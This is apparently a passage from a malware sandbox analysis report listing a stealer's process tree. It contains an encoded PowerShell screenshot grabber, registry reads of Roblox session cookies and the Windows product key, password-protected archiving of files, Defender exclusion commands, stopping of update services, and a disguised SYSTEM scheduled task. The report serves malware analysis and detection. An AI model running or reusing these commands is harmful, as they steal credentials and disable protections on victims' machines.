ZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4984
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rlvgvhjr\rlvgvhjr.cmdline"
        10⤵
        
        PID:2116
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB03.tmp" "c:\Users\Admin\AppData\Local\Temp\rlvgvhjr\CSC17F9315F8DB34DEC8BE9D4AC61F5DBCF.TMP"
        11⤵
        
        PID:5376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:3548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:2748
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:1348
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:5352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:5456
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:5628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:7408
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:2748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:5204
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:4912
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:5168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        8⤵
        
        PID:3416
        
        C:\Windows\system32\getmac.exe
        
        getmac
        9⤵
        
        PID:5540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19522\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\R40xE.zip" *"
        8⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\_MEI19522\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI19522\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\R40xE.zip" *
        9⤵
        Executes dropped EXE
        
        PID:4552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        8⤵
        
        PID:5916
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        9⤵
        
        PID:6000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        8⤵
        
        PID:6176
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        9⤵
        
        PID:6236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        8⤵
        
        PID:6284
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        9⤵
        
        PID:6388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        8⤵
        
        PID:6464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        8⤵
        
        PID:6776
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:6844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        8⤵
        
        PID:6920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        9⤵
        
        PID:6956
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:7948
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:6072
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:6112
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:6124
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:6140
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2592
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1672
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:4716
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1908
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1600
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4972
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:756
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:6884
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6880
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:7836
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7808
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:7888
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:7852
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:8080
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:8148
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:9144
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:6064
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:7984
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7972
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:9176
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:6676
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ffb6cbc9758,0x7ffb6cbc9768,0x7ffb6cbc9778
    3⤵
    PID:6708
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1580 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:2
    3⤵
    PID:6360
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1784 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:6364
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1816 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:6832
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2504 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:1
    3⤵
    PID:6776
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2512 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:1
    3⤵
    PID:6808
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3912 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:1
    3⤵
    PID:7324
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4596 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:7604
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4872 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:1668
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4996 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:7828
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:8104
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4852 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:1
    3⤵
    PID:8392
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:8228
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4776 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:1
    3⤵
    PID:8700
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4696 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:1
    3⤵
    PID:8240
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4680 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:1348
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:8
    3⤵
    PID:5420
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3188 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:1
    3⤵
    PID:5936
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3016 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:1
    3⤵
    PID:6256
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4008 --field-trial-handle=2552,i,14515670916378021438,9219472928163508307,131072 /prefetch:1
    3⤵
    PID:7300
- - C:\Program Files\Google\Chrome\Application\chrome.exe
